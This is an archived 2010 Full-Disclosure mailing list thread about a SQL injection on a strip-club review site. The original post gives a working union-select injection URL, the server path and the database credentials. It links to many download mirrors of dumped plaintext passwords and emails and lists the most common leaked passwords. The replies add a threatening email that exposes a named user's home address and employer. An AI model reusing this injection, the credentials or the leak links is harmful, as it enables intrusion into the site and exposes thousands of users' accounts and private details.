lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Wed, 8 Sep 2010 23:46:00 +0100
From: Benji <me@...ji.com>
To: Ben <iluv2cane@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, auto595158@...hmail.com,
	tuscl.founder@...il.com
Subject: Re: Tuscl.net SQL injection with 30k Plain Text
 Passwords & 80k Email list

This is gay.

On Wed, Sep 8, 2010 at 11:10 PM, Ben <iluv2cane@...il.com> wrote:
> From:  "www.tuscl.net" <tuscl.founder@...il.com>
> To:  auto595158@...hmail.com, iluv2cane@...il.com, benhuoh@...il.com,
> benhu@...sics.uakron.edu
> Date:  Wed, 08 Sep 2010 19:01:24 +0000
>
> Just received this email from the owner of the site:
>
> Ben
>
> How 'bout I send a couple of strippers over to your condo there in Akron so
> you can cane them.  You're still at 1381 Waters Edge, right?
>
>
> Then maybe I will blast out an email to all your colleagues there at the
> physics department of  the University of Akron with this little jewel...
>
> I have a suggestion for a Mood Pictures movie whic would be called something
> like "Crime Deterrent Video for Girls." ...
>
> Ah, hell, Ben, you know the plot... but what I really like is the last line
> of the email:
>
> "I think it is a nice psychological touch to imagine a class of 14 or 15
> year-old girls being made to see the canings shown in this video.  "
>
> I'm sure the FBI will be all over that.
>
>
> Tell you what Mr. Ben Yu-Kuang Hu, let's make a deal.  You clean up the mess
> you made, stay the hell off my site, and I will forget this little escapade
> ever happened.
>
> Deal?
>
> -----------------------------------------------
> So first off, I should report your ass to the FBI for prostitution.
>
> Second, this email account I signed up with, happened to contain the same
> password for your site as it did it's email.
> So to hide myself further and cause you to run around chasing my proxies and
> pin the blame on some retard who is obsessed over BDSM.
>
> Third, Ill fix your website, give me the root password :D
>
> On Fri, Sep 3, 2010 at 8:37 PM, Ben <iluv2cane@...il.com> wrote:
>>
>> worked in firefox....
>> if you see the title bar stating 3,8
>> thats the union select ;)
>> also per this page: http://www.tuscl.net/contact-login.php
>>
>> Recently we lost a week's worth of user data. We believe it was the work
>> of hackers, and have tightened our security measures.
>>
>> On Fri, Sep 3, 2010 at 8:32 PM, Jhfjjf Hfdsjj <taser3000@...oo.com> wrote:
>>>
>>> Well, one thing I will point out is that the link you submitted for the
>>> actual SQL injection doesnt seem to work. Either they fixed it or you messed
>>> up the link.
>>> ________________________________
>>> From: Ben <iluv2cane@...il.com>
>>> To: full-disclosure@...ts.grok.org.uk
>>> Sent: Fri, September 3, 2010 11:09:04 AM
>>> Subject: [Full-disclosure] Tuscl.net SQL injection with 30k Plain Text
>>> Passwords & 80k Email list
>>>
>>> I found many sql injections on Tuscl.net (The ultimate strip club list)
>>>
>>> I tried notifying the site, no response. The server is ran on a vmware.
>>> So anything that is done to it is restored, apon reboot.
>>>
>>> This is a dump of usernames passwords and emails for the site. They are
>>> in plain text. I have removed records that had the system generated password
>>> that the user never changed.
>>>
>>> http://tinyurl.com/397rzqs
>>> http://bit.ly/bkVnPY
>>> http://is.gd/eTqna
>>> http://jump.fm/FOJRO
>>> http://www.mediafire.com/?l6i1vd25il61a6b
>>> http://www.megafileupload.com/en/file/265174/users-sql-zip.html
>>> http://www.4shared.com/file/w0qqRyDf/userssql.html
>>> http://rapidshare.com/files/416858410/users.sql.zip
>>> http://rapidshare.com/files/416860069/users.sql.zip
>>> http://www.speedyshare.com/files/24097837/users.sql.zip
>>> http://uploading.com/files/e1741mm9/users.sql.zip/
>>> http://bit.ly/cFvd8B
>>> http://is.gd/eTsn5
>>>
>>>
>>>
>>> http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
>>>
>>> Common Passwords and the number of accounts that shared them
>>>
>>> password - 269
>>> 123456 - 173
>>> tuscl - 84
>>> stripper - 67
>>> qwerty - 62
>>> 12345 - 49
>>> 12345678 - 47
>>> 1234 - 42
>>> baseball - 36
>>> monkey - 36
>>> princess - 34
>>> stripclub - 33
>>> strip - 32
>>> jennifer - 32
>>> abc123 - 32
>>> mustang - 31
>>> pussy - 29
>>> lapdance - 27
>>> andrew - 27
>>> jmh1978 - 27
>>> letmein - 27
>>> fuckyou - 27
>>> 696969 - 27
>>> michelle - 26
>>> harley - 25
>>> dallas - 25
>>> 111111 - 25
>>> shadow - 24
>>> corvette - 24
>>> trustno1 - 24
>>> sunshine - 22
>>> dragon - 21
>>> jordan - 21
>>> love - 21
>>> butthead - 20
>>> batman - 20
>>> danielle - 20
>>> buster - 20
>>> password1 - 20
>>> hello - 20
>>> biteme - 20
>>> gaydar - 20
>>> Michael - 19
>>> george - 19
>>> hockey - 19
>>> ginger - 19
>>> 6969 - 19
>>> Bandit - 19
>>> lasvegas - 18
>>> taylor - 18
>>> tigger - 18
>>> yankees - 18
>>> chicago - 18
>>> fucker - 18
>>> blahblah - 17
>>> football - 17
>>> 1escobar2 - 17
>>> 1111 - 17
>>> Jessica - 17
>>> 123456789 - 16
>>> testing - 16
>>> phoenix - 16
>>> badboy - 16
>>> gemini - 16
>>> ranger - 16
>>> heather - 15
>>> gateway - 15
>>> secret - 15
>>> welcome - 15
>>> 654321 - 15
>>> aaaaaa - 15
>>> tennis - 15
>>> asshole - 15
>>> maggie - 14
>>> pepper - 14
>>> charlie - 14
>>> golfer - 14
>>> strippers - 14
>>> redskins - 14
>>> summer - 14
>>> peanut - 14
>>> chicken - 13
>>> jeremy - 13
>>> hunter - 13
>>> m0ntlure - 13
>>> fuckoff - 13
>>> dancer - 13
>>> bitch - 13
>>> lucky - 13
>>> whatever - 13
>>> killer - 13
>>> prince - 13
>>> robert - 13
>>> orange - 13
>>> thomas - 13
>>> hawaii - 12
>>> redsox - 12
>>> tiger - 12
>>> titties - 12
>>> gators - 12
>>> Password - cnt
>>> florida - 12
>>> kitten - 12
>>> austin - 12
>>> merlin - 12
>>> canada - 12
>>> diamond - 12
>>> boston - 12
>>> master - 12
>>> yellow - 12
>>> falcon - 12
>>> jasmine - 12
>>> 1234567 - 12
>>> cookie - 12
>>> superman - 12
>>> midnight - 12
>>> blowme - 12
>>> jackass - 12
>>> sparky - 12
>>> peekaboo - 11
>>> doctor - 11
>>> brandy - 11
>>> 8675309 - 11
>>> madison - 11
>>> braves - 11
>>> brooklyn - 11
>>> money - 11
>>> anthony - 11
>>> samantha - 11
>>> ashley - 11
>>> lucky1 - 11
>>> amanda - 11
>>> booboo - 11
>>> SOCCER - 11
>>> tarheels - 11
>>> bigdog - 11
>>> pookie - 11
>>> private - 11
>>> tiffany - 11
>>> martin - 11
>>> silver - 11
>>> lakers - 10
>>> eatme - 10
>>> junior - 10
>>> platinum - 10
>>> sex - 10
>>> iloveyou - 10
>>> nicole - 10
>>> vegas - 10
>>> wolfpack - 10
>>> 55555555 - 10
>>> barney - 10
>>> melissa - 10
>>> molly - 10
>>> passw0rd - 10
>>> sexy - 10
>>> nascar - 10
>>> dietcoke - 10
>>> chris - 10
>>> boomer - 10
>>> test123 - 10
>>> johnny - 10
>>> red123 - 10
>>> asdfgh - 10
>>> ncc1701 - 10
>>> 314159 - 10
>>> internet - 10
>>> jackson - 10
>>> computer - 10
>>> peaches - 10
>>> horny - 10
>>> sierra - 10
>>> rush2112 - 10
>>>
>>> Here is the complete list of email addresses registered. The site had no
>>> validated so, I am sure, some are fake.
>>> http://www.tuscl.net/emails.zip
>>> http://rapidshare.com/files/416871314/emails.zip
>>> http://www.mediafire.com/?67rzfbvmyr1c492
>>> http://www.speedyshare.com/files/24098846/emails.zip
>>> http://www.megafileupload.com/en/file/265210/emails-zip.html
>>>
>>> The path to the working directory is:
>>> /home/httpd/vhosts/tuscl.net/httpdocs/
>>>
>>> The SQL information is
>>> "localhost" - "tuscl" - "szg4wpl9"
>>>
>>> Also if you want to look at all the nudey photos uploaded here is where
>>> they are
>>> http://www.tuscl.net/pictures/
>>>
>>> There are other sites that could have been comprimised as well:
>>> vanjonesthinksimanasshole.com
>>> tuscl.com
>>> onerun.com
>>> ecampguide.com (contains another 1200 plain text passwords)
>>> troopedge.com
>>>
>>> Well have fun!
>>> Owner or media if you want get ahold of me:
>>> auto595158@...hmail.com
>>>
>>
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ